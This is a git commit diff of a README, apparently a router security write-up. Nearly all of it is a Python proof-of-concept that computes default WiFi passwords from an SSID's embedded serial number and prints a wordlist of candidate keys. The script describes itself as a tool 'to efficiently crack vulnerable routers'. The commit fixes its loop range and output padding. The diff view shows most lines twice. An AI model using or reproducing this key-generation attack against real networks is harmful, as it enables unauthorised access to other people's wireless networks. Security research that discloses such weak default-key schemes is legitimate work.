Update 'Readme.md'

This commit is contained in:
nico 2020-05-06 20:01:57 +00:00
parent 350e1aa5dd
commit 0447c7daad

View File

@ -493,28 +493,28 @@ With this information we can write a PoC script that can produce a wordlist to e
import argparse, base64, hashlib, re import argparse, base64, hashlib, re
def genpwd_longpasswd(oui, serialnum): def genpwd_longpasswd(oui, serialnum):
def str2md5(string): def str2md5(string):
m = hashlib.md5() m = hashlib.md5()
m.update(string.encode("ascii")) m.update(string.encode("ascii"))
return m.digest() return m.digest()
#secret1 = "%s-ALCL%s" % (oui, serialnum) #secret1 = "%s-ALCL%s" % (oui, serialnum)
secret2 = "%s-01%u" % (oui, int(serialnum, 16)) secret2 = "%s-01%u" % (oui, int(serialnum, 16))
#md5_secret1 = str2md5(secret1) #md5_secret1 = str2md5(secret1)
md5_secret2 = str2md5(secret2) md5_secret2 = str2md5(secret2)
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30] #wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
lower = upper = 0 lower = upper = 0
for i in range(8): for i in range(8):
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
longpasswd = ((upper<<32)+lower)%0x2540be400 longpasswd = ((upper<<32)+lower)%0x2540be400
return longpasswd return longpasswd
parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers") parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers")
parser.add_argument("ssid", type=str, help="the ssid to attack") parser.add_argument("ssid", type=str, help="the ssid to attack")
@ -551,8 +551,9 @@ for s in ssids:
serialBytes = args.ssid serialBytes = args.ssid
for r in s.split("[A-F0-9]{4}"): for r in s.split("[A-F0-9]{4}"):
serialBytes = serialBytes.replace(r, "") serialBytes = serialBytes.replace(r, "")
for i in range(0xffff): for i in range(0xffff + 1):
print(genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))) candidate = genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))
print(f"{candidate:010}")
break break
``` ```